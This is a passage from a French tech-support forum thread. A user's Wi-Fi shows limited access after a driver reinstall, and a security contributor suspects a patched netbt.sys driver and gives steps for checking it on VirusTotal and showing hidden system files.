    je vais demander un autre avis, en attendant desinstalle le driver de ta carte réseau et résinstalle le pour voir....
    0
  18. vincent3569 Messages postés 125 Statut Membre 4
     
    bonsoir

    comme tu me l'as suggéré, j'ai désinstallé puis réinstallé le driver de ma carter wifi : rien n'a changé, j'ai toujours un accès limité.

    j'ai tenté une suppression de mon pc sur ma box puis un nouvel appairage : rien n'a changé, j'ai toujours un accès limité.

    sur le panneau de configuration, j'ai accédé aux outils de résolutions de problèmes.
    - l'outil Connexion Internet me donne l'erreur suivante : Windows n'a pas pu détecter automatiquement les paramètres proxy de ce réseau.

    - l'outil Carte réseau me donne l'erreur suivante : "Connexio de réseau sans fil" n'a pas de configuration IP valide.
    0
  19. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    il y du driver patché

    Rends toi sur ce site :

    https://www.virustotal.com/gui/

    Clique sur parcourir et cherche ce fichier :

    C:\Windows\System32\DRIVERS\netbt.sys

    Clique sur Send File.

    Un rapport va s'élaborer ligne à ligne.

    Attends la fin. Il doit comprendre la taille du fichier envoyé.


    Copie le lien de Virus Total dans ta réponse.


    Si tu ne trouves pas le fichier alors

    Affiche tous les fichiers et dossiers :

    Pour cela :
    Clique sur démarrer/panneau de configuration/option des dossiers/affichage

    Cocher afficher les dossiers cachés

    Décoche la case "Masquer les fichiers protégés du système d'exploitation (recommandé)"

    Décocher masquer les extensions dont le type est connu

    Puis fais «appliquer» pour valider les changements.

    Et OK


    tuto pour t'aider


    http://www.bibou0007.com/scans-en-ligne-f75/tutorial-sur-virustotal-t190.htm
    0
Précédent
  • 1
  • 2
  • 3